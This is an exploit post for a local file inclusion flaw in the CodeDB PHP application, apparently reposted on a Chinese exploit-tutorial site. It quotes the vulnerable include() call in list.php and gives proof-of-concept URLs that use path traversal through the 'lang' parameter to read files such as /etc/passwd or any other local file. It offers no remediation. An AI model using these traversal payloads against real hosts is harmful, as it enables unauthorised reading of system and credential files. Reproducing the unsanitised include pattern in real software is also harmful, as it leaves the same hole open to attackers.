CodeDB (list.php lang) Local File Inclusion Vulnerability_Exploit教程-查字典教程网
CodeDB (list.php lang) Local File Inclusion Vulnerability
CodeDB (list.php lang) Local File Inclusion Vulnerability
发布时间:2016-12-21 来源:查字典编辑
摘要:######################################################################...

###############################################################################

#

# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability

# Author : cOndemned

# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*

#

###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension

8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt

http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd

http://[host]/[codeDB_path]/list.php?lang=../[local_file]

EoF.

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
    •
    最新Exploit学习
    热门Exploit学习
    网络安全子分类